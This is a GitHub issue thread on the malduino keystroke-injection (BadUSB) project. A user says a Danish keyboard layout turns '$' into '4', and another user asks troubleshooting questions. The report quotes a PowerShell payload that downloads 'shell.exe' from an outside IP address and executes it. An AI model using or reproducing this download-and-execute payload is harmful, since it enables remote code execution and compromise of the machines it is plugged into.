Seytonic / malduino

All the Malduinos!
MIT License
208 stars 50 forks source link

4 instead of $ #10

Open Logynymo opened 7 years ago

Logynymo commented 7 years ago

Every "$" in the script turns to 4 when plugging in the malduino Im using DK keyboard layout.

STRING $down = New-Object System.Net.WebClient; $url = 'http://100.74.10.20/shell.exe'; $file = 'shell.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;

so it ends up typing STRING 4down = New-Object System.Net.WebClient; 4url = 'http://100.74.10.20/shell.exe'; 4file = 'shell.exe'; 4down.DownloadFile(4url,4file); 4exec = New-Object -com shell.application; 4exec.shellexecute(4file); exit;

MarvinJWendt commented 7 years ago

Quick questions:

  1. Are you using a Lite or Elite?
  2. Have you choosen the right Keyboard Layout from the converter?
  3. What combination is used in your keyboard layout for a $ (Shift + 4 ?)
Logynymo commented 6 years ago
  1. Elite
  2. I chose da_DK because i'm from Denmark
  3. to get $ i need to use (right-alt + 4) Can't remember if typed it right because its so long ago.